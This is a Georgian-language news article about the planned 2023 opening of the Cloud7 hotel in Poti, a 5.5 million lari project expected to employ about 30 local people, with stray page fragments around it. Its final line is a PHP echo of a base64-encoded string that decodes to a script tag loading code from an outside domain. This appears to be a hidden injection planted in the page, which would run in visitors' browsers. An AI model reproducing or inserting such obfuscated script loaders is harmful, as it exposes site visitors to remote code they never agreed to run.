celsiusi
ავერსი საქკაბელი
ფოთში, ახალი სასტუმრო „Cloud7 ფოთი” 2023 წელს გაიხსნება. პროექტის საინვესტიციო ღირებულება 5.5 მილიონი ლარია, რაც ფოთში არსებული სასტუმრო "ანკორის” გარდაქმნა/რეაბილიტაცია ითვალისწინებს. სამუშაოები მიმდინარე წლის ნოემბერში დაიწყება.
 
როგორც კომპანიის წარმომადგენელმა ენტონი დუსემ BM.GE -ს განუცხადა, საერთაშორისო ჰოსფითალითი ბრენდის მულტიფუნქციური სასტუმრო - Cloud7 Hotel and Residence Poti 5-ვარსკვლავიან სასტუმროსა და აპარტამენტებს, გასართობ-სარელაქსაციო სივრცეებსა და ბიზნეს ჰაბს გააერთიანებს.
 
"აღნიშნული პროექტის ინვესტორია "ინდეკო ჰოსფითალითი", რომლსაც სტუმარ-მასპინძლობის მიმართულებით ერთ-ერთი უმსხვილესი ჰოლდინგი "კერტენ ჰოსფითალითი" მართავს. იგი მსოფლიოს მასშტაბით 12 ქვეყანაში, 40-ზე მეტი წარმატებული პროექტის ავტორია", -აცხადებს დუსე.
 
მისივე ცნობით, ფოთში, მულტიფუნქციური სასტუმროს გახსნა მნიშვნელოვანი ნაბიჯია ქალაქისა და რეგიონის ეკონომიკური განვითარებისთვის.
 
"მულტიფუნქციური ცენტრი ხელს შეუწყობს ბიზნესტურიზმს, ქალაქის მცხოვრებთათვის თავშეყრის სივრცეებისა და დამატებითი სამუშაო ადგილების შექმნას", - თქვა დუსემ ბიემჯისთან
 
პროექტის ფარგლებში დასაქმდება 30-მდე ადამიანი. შეირჩევიან ადგილობრივი კადრები და მოხდება მათი საერთაშორისო სტანდარტების მიხედვით დატრენინგება და გადამზადება.
 
"ფოთის მოსახლეობისთვის ეს იქნება განსაკუთრებული შესაძლებლობა გაეცნონ თანამედროვე სტუმარ-მასპინძლობის უმაღლეს სტანდარტებს და შანსი მათი პროფესიული განვითარებისა და წინსვლისთვის. მულტიფუნქციური სივრცის გახსნა განსაკუთრებით მნიშვნელოვანია ახალგაზრდებისთვის, რომელთაც დღევანდელ რეალობაში ქალაქი მათზე მორგებულ გასართობი თუ სარელაქსაციო ობიექტების არჩევანს ვერ სთავაზობს. მათთვის მშობლიურ ქალაქში დასაქმების პერსპექტივა ჩნდება", - განაცხადა კომპანიის წარმომადგენელმა.
425
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");